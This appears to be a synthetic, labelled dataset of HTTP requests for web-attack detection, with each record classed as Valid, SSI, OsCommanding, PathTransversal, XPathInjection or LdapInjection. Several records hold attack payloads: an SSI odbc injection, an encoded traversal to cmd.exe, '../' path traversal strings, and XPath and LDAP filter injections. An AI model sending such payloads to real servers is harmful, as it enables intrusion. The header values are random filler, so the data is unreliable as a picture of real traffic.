If-Range: Fri, 23 Jun 06 03:50:44 CET
Max-Forwards: 2
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Digest algorithm=MD5-sess
Range: 2718-09734,749039-
Referer: /isdtc/zuth/nund.pl
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: lngl (nrL9ATBiPO; oSEZVoKH; uzdOY7)
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/8.9 84.234.127.185, 6.5 228.22.14.50, FTP/5.2 www.eestafif.html
Transfer-Encoding: letot; tfei9=lpsya
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47553
Start - Id: 40832
class: SSI
GET /ty7x-_zrJLx@8Y.shtml?5cn44hrb=%5Cn&ehetmpd=t2e%282&F9CFPtKShavingAF=%3C%21--%23odbc++connect%3D%22oxqhlr%2CIroT%2Csoher%22++++++++++statement%3D%22select+++*++++from+++Ow3%22--%3E&eRbvtrslfiitlCc=94049464&ocw4hshaTOtAwt=erOhAawWtrda3uHtr&IPGKeTqj9DII=943 HTTP/1.1
Host: 38.112.131.52
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 243.167.247.234
Cookie: BzoNiY7=hteval e\3rm':;dnonGa=0733256;KBlYzdhx7S=zaTahhnsotevosnT;d0ria=Eet<
Cookie2: $Version="4"
Date: Mon, 23 Feb 09 02:37:52 UTC
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: oulsi
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "Jo7ny@NkLhw3Y-@ghQ@"
If-None-Match: "rZc1_isaOo7r18Hs."
If-Range: "96PGJY@4oadOCnn2hSFx"
Max-Forwards: 83
MIME-Version: 0.3
Pragma: ab5S='et9ie'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic T2FudGFoOm90Z3hsZW93
Range: 4-703669
Referer: /L5cbo/can8lch/hHttla/nen7bimi.msf
TE: chunked;q=0.3,trailers,trailers
Trailer: Accept
User-Agent: 6o2sesx/3.6.0
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7606x249
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: identity
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 213.213.96.18
X-Serial-Number: 40747153756954
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40832
Start - Id: 21137
class: Valid
GET /n8-_PP0N465JLUUUHp/QzpasswdY6optE.66.css?ska.=wbxkDI&npooFimarbgmrcc=maah9ftEdlnbS6ws&d5aaq=u HTTP/1.0
Host: www.AriEa.ch:80
Connection: Toeei
Accept: */*;q=0.5
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 139.120.122.69
Cookie: anooewt2e=3571;w8s=83
Cookie2: $Version="38"
Date: Thu, 05 Jan 06 19:30:32 GMT
ETag: W/"hWRpPft4emuq-na5Rme"
Expect: tetnMsTh
From: dhehtais@ahehpggov.uk
If-Modified-Since: Sun, 17 Apr 05 15:14:45 CET
If-Unmodified-Since: Mon, 14 Feb 05 07:24:03 GMT
If-Match: *
If-None-Match: "bLYMzysmw_eg7ia"
If-Range: "5tUwn5cJ2C@PCXgQ"
Max-Forwards: 122
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM OHV1MmUycm1ucHU1OGVvbjdhclIyb3RpZTJsYWVvYnI=
Authorization: Basic YTRlb3I6U3Nla25j
Range: 3-
Referer: http://9riaoh.de/gAoi/mBe4hu.cgi
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 0.0; le-ni; rv:6.8.9) Gecko/03823461
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 739x758
Via: HTTP/3.1 110.238.46.49
Transfer-Encoding: eonr
Upgrade: olhOla/3.4, eiCcnJ/2.6, t0pcs/1.5, eshn/2.6
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 121.247.72.172
X-Serial-Number: 9779680
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21137
Start - Id: 43868
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ldirdc.be:82
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ruoyIr-nsyqc;q=0.8, n-heOssl, n-4, r8ae-wtEec;q=0.7
Cache-Control: no-cache
Client-ip: 132.134.82.134
Cookie: aooDNe8aehuod=deo;dOFB.bfyamail=3811990;enoLr1hte=e07a6j;Tsht=yhelf5hqdAe4etJhm;Nn=ee\stwqitmginhn
Cookie2: $Version="109"
Date: Sun, 22 Feb 04 09:59:22 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Fri, 27 Nov 09 02:52:39 UTC
If-Unmodified-Since: Sun, 25 Sep 05 05:41:40 GMT
If-Match: "V_CJiOGq0qH4Xo7"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: NTLM aGdkYTdjZWRucWhVZVdUdWVFZWNwbnNleXRvNXR0bWlhc21yZGZkNnJjYWNFcjU3
Range: 91796-,027282-114595
Referer: http://j4hse.ch/eceera9s/ogovabp/sr8esd.jpeg
TE: gzip;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 8.1; wk-Ta; rv:4.1.9) Gecko/02542901
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/7.1 www.dsOpFhe.jpg:988, FTP/1.3 www.fndeeYt.html, HTTP/6.4 222.118.147.81:4
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43868
Start - Id: 21421
class: Valid
GET /Eo88euadrseorshaane/4cpne8.pl?KfCptelnetWft=0Wa HTTP/1.1
Host: www.tsw9et.ch:80
Connection: keep-alive
Accept: image/png;q=0.9, application/rtf, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: ea4fs-e4eicaa, omtuWof-sstC;q=0.9
Cache-Control: no-cache
Client-ip: 47.229.62.23
Cookie: iesestbhqswi7i=7;oafiRtik=gZcY3H;atg4in8pe=ysatxloaefc;releiniss=yse;2RXZ=t 
Cookie2: $Version="85"
Date: Sun, 27 Sep 09 05:10:46 GMT
ETag: "nn7NGEr6jzML_H2"
Expect: mrae
From: unnd4yhe@pnsUaeitiH.biz
If-Modified-Since: Sun, 21 Mar 10 10:21:24 CET
If-Unmodified-Since: Sun, 08 Mar 09 11:18:51 CET
If-Match: "3U1ZjyVrcBkmjaaRMC"
If-None-Match: "abLW_mFZTLW@qzSX.Ukh"
If-Range: *
Max-Forwards: 31
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="Ac6eaF266Ca7B70FE5920F1FE64EFBf3"
Authorization: Digest cnonce="6srsm"
Range: 9389-552,913284-,86-
Referer: /srMEpaR/10r4t/fsloa.sh
TE: gzip;q=0.8,gzip,trailers
Trailer: Max-Forwards
User-Agent: nMpXQEs73u http://www.eisr7.be
UA-CPU: Sparc
UA-Disp: 425,9226,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 9.7 27.94.250.107
Transfer-Encoding: compress
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 537 www.qAwwh9uW.css "huyeai3leuoqha7ci" "Sat, 07 Aug 04 03:47:33 CET"
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21421
Start - Id: 45026
class: PathTransversal
PUT /giEx1laieceSomliwnfw/jaersaz.css? HTTP/1.1
Content-Length: 88
Content-Language: heehpaR,stn24dr
Content-Encoding: compress
Content-Location: /uyon/kHsutg0/iol3eTnE/uhoI8ti.swf
Content-MD5: cmJpdGVzcmV0cmxlOTZ1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Mar 05 09:57:48 UTC
Last-Modified: Mon, 11 Dec 06 18:20:38 GMT
Host: 81.93.255.109
Connection: 1c20cu
Accept: application/*, text/xml
Accept-Charset: *;q=0.5
Accept-Encoding: ./../../../../../
Accept-Language: neas-dtxna, 4yTace-larghds
Cache-Control: max-age=401
Cookie: ueveantnaaatT7=102127
Date: Wed, 06 Sep 06 06:56:23 UTC
Expect: 100-continue
If-Modified-Since: Wed, 30 Mar 05 12:04:40 CET
If-Unmodified-Since: Mon, 07 Sep 09 23:15:47 GMT
If-Match: "rn5xt-5wT1xgAbiPQch"
If-Range: Wed, 30 Nov 05 05:41:20 CET
Max-Forwards: 6
Pragma: no-cache
Authorization: Digest opaque="iaIoeb6"
Referer: /lataedY/r7daf/c8mtd/ocxuxeUf.dll
TE: chunked,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.2 (compatible; eatr9; Open BSD i386; Hguan5sh; dhaTeiuttf; atedk)
UA-Pixels: 128x456

srhe4s3oParId=i &e5iaidnittlei=zn5swefe1&oolssdn=16923897&dn8n2Aneesdm4nu=13&FVYqGj8=boA

End - Id: 45026
Start - Id: 1254
class: Valid
GET /riMnljpiOecfumti/X8e4ntopafg/hfJgXks_cYbnTalO0sj2/erjzduEmijd/aotaosaqantra/mituto8/etodhalcthnjayoyo/msmfryedtema/givlqRweadsooLBoadu/4QzT5/h_enLlhpxb.png? HTTP/1.0
Host: 254.91.66.57:80
Connection: nImRda
Accept: text/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.1, identity, identity;q=0.9, gzip;q=0.8, compress;q=0.9
Accept-Language: IwonN4ce-rATq, weeolchd-rmna, 2Eoraho-e;q=0.4
Cache-Control: min-fresh=30783
Client-ip: 212.163.198.161
Cookie: mnfOa=2D54-d
Cookie2: $Version="279"
Date: Sun, 21 Dec 08 03:47:59 GMT
ETag: "8xH@qxd@uk_fuEr8"
Expect: gdfItt
From: dSeu@yRMgnu.net
If-Modified-Since: Sun, 10 Oct 04 18:43:12 GMT
If-Unmodified-Since: Fri, 25 Jun 04 13:58:11 GMT
If-Match: "bV@Y5DlD7wH4--M03e"
If-None-Match: *
If-Range: *
Max-Forwards: 033
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: nhcD swatey=b4qt
Range: -709
Referer: /niedk/edeee/wdrah2i/2itm.wav
TE: gzip,gzip,trailers
Trailer: Warning
User-Agent: dV5P.d http://www.euaAl31.biz
UA-CPU: Sparc
UA-Disp: 4986,1989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7645x440
Via: 4.2 www.wo7e.js, 8.7 44.46.146.115
Transfer-Encoding: t4oipO
Upgrade: oisa/9.7, yntnte/0.1
Warning: 995 www.d0torsa.jpeg:3081 "RcaejnliMt062" 
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 5267293747138696833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1254
Start - Id: 35918
class: XPathInjection
POST /n4/wsdoDns7mmeee2mf/loeodOs38Duag/cqPH5QG9oKNNji@.JW/wgetupdatew1QJo/wohniitIccdhI2cnI863.jpg? HTTP/1.0
Content-Length: 263
Content-Encoding: gzip
Content-Location: http://www.aeihE.st/Tyef/tbiEhie/wtwmifo/nnidee/jTsLe.jpeg
Content-MD5: U28ycmVwdHNlb3ZlYXVlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Nov 09 18:09:39 CET
Last-Modified: Mon, 08 Feb 10 23:29:59 CET
Host: 234.10.101.108
Connection: close
Accept: application/x-tar, video/quicktime, audio/basic;q=0.2
Accept-Charset: x-mac-hebrew, x-mac-icelandic, iso-8859-7;q=0.6, big5
Accept-Language: o9Hce9oi-haliqne, sw-1aerhrf;q=0.3, sfgje-zt;q=0.7, lebher1o-lescs6;q=0.8
Cache-Control: iiSr3='mlthai'
Client-ip: 148.36.185.111
Cookie: erht=sch'   or path/child::node()[position()=N]  or 'awnvT' =  '
Date: Tue, 19 Aug 08 01:16:18 CET
ETag: "mQ@ndBOwO_LoARd"
If-None-Match: "INeekt50_62z1Ed2U"
If-Range: Thu, 10 May 07 08:56:34 GMT
Max-Forwards: 52
MIME-Version: 1.3
Proxy-Authorization: Digest response="CfaA6a72732dF9A2585EbB51096dD3BC"
Referer: /a7oEh/eTsh/hu5h.rar
TE: deflate,deflate,chunked
User-Agent: Mozilla/5.2 (Windows; U; WinNT 4.4; ga-i9; rv:5.1.2) Gecko/68532049
UA-Pixels: 191x552
Warning: 852 44.117.154.79 "niaomSoehti8lpinr" "Fri, 04 May 07 07:12:14 UTC"

eozt=tiMnxeneH&UC85lib=nrerles&nenta3axsa4x=eles2iTa4ntdtl&9schl4hbdmaRtuq=6w5ehtcijchifidk3eie&nLendte=odtcubegosX&eryheeiiaapos=iB9Et&eueiyttshotMar=19034&ongye=22&bf9ddl7etseehsw=06894&hrOfeibcqiES=9808&ppuel92nan=dtenti&X1-16Bprocessing-instructiontmpEBOz=584

End - Id: 35918
Start - Id: 16022
class: Valid
GET /e6hLutSreh3taoca/zeoeafel7/ooetesoot1yspdml/sx7/eiecloyc9iei3Tiiafh/TlhsoririiBA9/evNGXU5-QoSeB_T/rd18E/htdxrve/tznCQJy4s6ukhJt8V.tiff? HTTP/1.0
Host: www.Twfz.de
Connection: close
Accept: text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 251.149.33.159
Cookie: Iip4s76Jastece=Olocationludentwg)ezee@wef;tdIsrugieu=b62KuK9V0;hshttrco=68;venslxwD=frg;3eanlze3ckt=eFsrxelfnhmteR
Cookie2: $Version="932"
Date: Tue, 08 Jul 08 17:20:13 UTC
ETag: "d_0jC2jHellSi@2BxW"
Expect: 100-continue
From: ioDenuTw@Aree.gov
If-Modified-Since: Wed, 25 Aug 04 16:34:28 CET
If-Unmodified-Since: Sun, 05 Feb 06 07:58:32 GMT
If-Match: "NkdBX-pf_gK3qdsx"
If-None-Match: "2DP.QdeAlQMe1QUK@.Ri"
If-Range: "ZknCJn_hWMmHRilPHjVh"
Max-Forwards: 15
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic c3NyTnplOmlkcm9vNnI=
Authorization: Basic ZWVubW9lZXQ6bWUyYW9z
Range: 120-88552
Referer: http://www.h8tE5.com/cektiqC.php4
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.3 (compatible; cowoer4; Windows NT; 1qayotTau; eqefgjeoo; twtirno)
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 273x3585
Via: FTP/8.0 www.iohelY.jpg:4392, FTP/0.4 216.3.151.249:164, FTP/9.3 116.118.151.232
Transfer-Encoding: identity
Upgrade: pnhh/6.6, iweta/0.9, 8roie/6.1
Warning: 192 www.smdny5nu.gif "em7hryt" "Wed, 17 Mar 10 12:26:18 GMT"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 72597578959631
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16022
Start - Id: 49075
class: XPathInjection
GET /0MVyKcJixWY810n_/l5at6aartrdaseyh/M8el/eE67wEDaZFjnGDcVT/agjV3tHvFJkMSaUvHCK/eV/3G/tVedThsjXIpsWi/HssoNqa.asp?DasehenGt1EctE=2013&nAQelikeLb=rnvrliRenadvenaert&wUwv=ai%246%40njHpl6&PF2fNS=%29e%40passwdb4&eriMoS=%2Bli0+&Ttita=5403&binnxya86taeoeX=eotaaa&si4nFrttaeer=h06eaTsiasmmo&ohiytinr=nOAenjh%27++or+%28i+++++%3C+++count%28cd%2Fchild%3A%3Atext%28%29%29++++and+j++++%3C++++count%28tSee%2Fchild%3A%3Acomment%28%29%29+++++and+k+%3C++++count%28soe%2Fchild%3A%3A*%29+%29+or+++%27E7oyn1%27++++%3D++++%27++++niyh%27+++++or&my=3&aEkEtusTtenl=mMRCkwUJvv&tiPg=58&PYXm_s0=3k%7Eehrymcao%3E&reopccla=4&xhoNYvarwindow.open=v5e HTTP/1.0
Host: www.suqpe0me5a.cz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1258, shift_jis;q=0.4, cp-936, iso-8859-8;q=0.3, x-mac-roman
Accept-Encoding: 
Accept-Language: yrnzuS-4dcb, lebieaqg-2x, 0cEdmuT-hnIae, ilefo-uDusoa, sepIrgo-dct
Cache-Control: no-transform
Client-ip: 22.250.1.169
Cookie: vlse=10
Cookie2: $Version="08"
Date: Thu, 29 Apr 10 17:38:27 CET
ETag: "FxFGVkKbgEi3wINjXU0"
Expect: 100-continue
From: norRi@7iswxtjsoi.uk
If-Modified-Since: Sun, 27 Aug 06 09:40:58 UTC
If-Unmodified-Since: Fri, 30 Jul 04 22:57:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.6
Pragma: q1peqba='dmm'
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: Digest algorithm=h4hoh
Range: -42,-211,1-7615
Referer: /ors7nt/urawtzn.jsp
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: fogNm/1.5.6.5.7
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 8.5 www.sjoseE9e.gif:7
Transfer-Encoding: nIye; Eeinf=oilog
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49075
Start - Id: 8056
class: Valid
GET /pti/ONCorRB/ttatltndxuhr3ss/iy4BK90r@cHFZX7C/h3FLQEb9MkjSkVhmw/sZavFu1uVQ/Fets/hrreNogusucrtnu17hg/gaczeubRol.mdb? HTTP/1.0
Host: www.Fxsoeetap.de
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-korean;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: Ulxe-zn;q=0.0, rii2ye-e7, lSyteiao-Weo9aie, psoTen-hd8tnT
Cache-Control: no-store
Cookie: srhnsuq5r=344504
Date: Thu, 30 Jul 09 12:59:16 GMT
If-Unmodified-Since: Sat, 05 Mar 05 05:23:54 CET
If-Match: *
If-Range: Fri, 14 Jul 06 11:10:20 CET
Max-Forwards: 5163
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: YsN39r adouz=1z3nk
Authorization: Digest realm
Range: -7887,3458-,5341-
Referer: http://www.6etdlti.be/Snnytb.tar.gz
User-Agent: Mozilla/8.7 (Windows; U; Win98 7.3; at-at; rv:9.2.5) Gecko/29767290
Transfer-Encoding: nsdfwu
Warning: 863 162.184.82.83 "ktah" "Tue, 29 Mar 05 04:42:21 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8056
Start - Id: 28005
class: Valid
GET /oezhYenheoasxoer/eeHgk0F6gkw4a/prpJ54ezOg3KFX/etEBhFnccasgOdrciegt/tY5m_LjsChvaCYRkB2X5/pGvgl8tlSpKH0xFjYjU/Iia0eotsANmtonQolq/firobOiuueaezsuef.html?AeTbkychild4child=na&twnr3sxytwbon=3591&netcatvlogI9h.EYu5=r+o&ho2i3E=e.kK&a06norait=i%3A61dsock_streamN&ck0Gep8a3fHerel=+ HTTP/1.0
Host: 246.241.120.224
Connection: tDhrrdn
Accept: application/rtf;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 1.21.191.228
Cookie: a1dv=ndwttl>'~@ah2coiscript;QxVEM=1217;tbge=baetioit
Cookie2: $Version="827"
Date: Sun, 01 Mar 09 15:29:52 GMT
ETag: W/"TrLN.0mS84@N51ox-g"
Expect: 100-continue
From: gnfoD3ti@acjf.biz
If-Modified-Since: Wed, 18 Mar 09 02:54:05 CET
If-Unmodified-Since: Sun, 13 Jan 08 06:24:39 CET
If-Match: *
If-None-Match: *
If-Range: "_QmjqOuR5.bx5nkLSeL6"
Max-Forwards: 3969
MIME-Version: 1.4
Pragma: d='i'
Proxy-Authorization: Basic em5lZXQ6YWhlZXNvQQ==
Authorization: enwanb feror=t4esus
Range: 8-0682,02-75,632-32413
Referer: /0ls1aEe/omnmte9t.mpg
TE: chunked,trailers
Trailer: Referer
User-Agent: crna56NlereOmre
UA-CPU: x86
UA-Disp: 0910,8594,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0862x292
Via: FTP/2.5 237.110.223.27, eioh/6.3 www.do0iiLt.html:22, 0.6 www.extuec.css:6937
Transfer-Encoding: compress
Upgrade: 5Dytss/2.7
Warning: 600 www.t3xste.htm "ayawvwhS" "Wed, 03 Aug 05 13:48:43 UTC"
X-Forwarded-For: 83.205.211.13
X-Serial-Number: 74859239794472887
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28005
Start - Id: 45403
class: PathTransversal
PUT /eidlekilg/s_V9mfjt0fm48e/meta@lLdfMAc/hunrtiaovzio/eeosofEiwieda/etcHVKK6ToPbhomebaccess_logM/dreEjeon27qsa/Aoesuqtagllio/onz7iG/otEDh1Tb/Zbt/yatantB.png? HTTP/1.1
Content-Length: 247
Content-Language: e
Content-Encoding: deflate
Content-Location: /z2nelpc/igti/tagi.cgi
Content-MD5: eWQxYW1vaWFjNGFlaWVrcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 18:50:20 GMT
Last-Modified: Wed, 22 Mar 06 20:43:01 UTC
Host: 226.172.80.148
Connection: isIE
Accept: audio/*, video/*;q=0.4, application/postscript
Accept-Charset: utf-8;q=0.1, ks_c_5601-1987, euc-tw;q=0.5, iso-10646-ucs-2
Accept-Encoding: compress, identity;q=0.5, identity, gzip, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 182.249.119.41
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sun, 25 Jan 09 21:20:26 GMT
ETag: W/"-yfA6unXQjL3zd2"
Expect: ceauo
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: Fri, 17 Oct 08 08:28:41 CET
Max-Forwards: 3227
MIME-Version: 8.0
Pragma: g=eLdcnsm
Proxy-Authorization: qei4S 0e1e=mede
Authorization: a4Eja aO53=lrnwidtl
Range: 50-63221
Referer: http://www.npTa.org/hsSts/m4x0.bin
TE: trailers,deflate,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: t9yiup
UA-CPU: MIPS
UA-Disp: 088,174,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 2.0 www.sftfsq42.css, HTTP/7.3 www.mesetd.tiff
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MtSAQ=75579&clNIar1e=n sraigioir0ivIep=Pm&1udEhup=tcn ncdDr7nesformd&N9QNV1cb_=eqbn&Eoe=lttUaoeltnitvoa&eeRlirVcMethhr=oehphpeoehWs&vnliawsl=9&eriblpb=/../../../Inetpub/iissamples/esnd/mari/latoeses/iltamameon.bin&wmeireat=6wbr

End - Id: 45403
Start - Id: 38914
class: LdapInjection
GET /r2ETOK5P/x3J.png?9ihi=eSs0hevbg&td9lhnsexojhdpn=pRn5tetmetamssrdz&ai6rU=ulHo&hptmnEgUm4fnrii=660952666&JrAqrEi2Ew=rew%29%28%7C+++%28is%3D*%29&qcPwhereJGwp-I7Wrm=eQyyo6HoClTz&zet=s HTTP/1.1
Host: www.wAlliys.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 28.220.202.244
Cookie: eEsuXeoesme= mtmw|:hTnttT;ssibeyw=sFtmp;Lpr4i=hrl]h
Cookie2: $Version="45"
Date: Tue, 28 Feb 06 09:29:53 GMT
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: 0behbt@re7t77.uk
If-Modified-Since: Mon, 02 Jun 08 13:29:09 GMT
If-Unmodified-Since: Sun, 20 Aug 06 09:22:44 UTC
If-Match: "tPJS-._P.Hq9OBZvSK"
If-None-Match: "L7CN2SfNtJQlPfAas."
If-Range: *
Max-Forwards: 607
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: hgeet tYei=R5lh
Range: 979-,2-1
Referer: /ltnyMMN.gif
TE: chunked;q=0.6
Trailer: Pragma
User-Agent: mcneeduiimf91oiy
UA-Disp: 518,9521,8
UA-OS: Win95
UA-Pixels: 1628x672
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 239 www.vyh2ooi.js "ghiwstugdquhncr" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38914
Start - Id: 45247
class: PathTransversal
GET /../../? HTTP/1.0
Host: www.rHdrxe1n.uk
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.9, x-mac-ce, x-mac-turkish;q=0.4, euc-jp
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=85
Client-ip: 172.49.251.232
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="58"
Date: Mon, 19 Oct 09 22:00:02 UTC
ETag: W/"TC1C.R6SZLoWaRYE"
Expect: nT6mf=6igw
From: pdeOseO@dTeieho.org
If-Modified-Since: Sat, 21 Oct 06 03:23:31 CET
If-Unmodified-Since: Tue, 05 Aug 08 21:38:46 GMT
If-Match: *
If-None-Match: "Wh09e26zYoUqMEo"
If-Range: Sun, 25 Jan 09 09:28:44 UTC
Max-Forwards: 9282
MIME-Version: 1.7
Pragma: e2afl='nmu'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM bWVzdG1zdHJzZWFhYXlkaG9JZjZ2a2c3dG9sYWluMm5UYzJvbw==
Range: 220-5761,42620-
Referer: /WRevaets/3rtd/jgaaey.jpeg
TE: trailers
Trailer: Cache-Control
User-Agent: einpk/9.6.9.4
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/4.1 235.151.203.81, szO/2.2 www.oltsih.tiff, 0.4 www.ltnbesen.htm
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45247
Start - Id: 39642
class: SSI
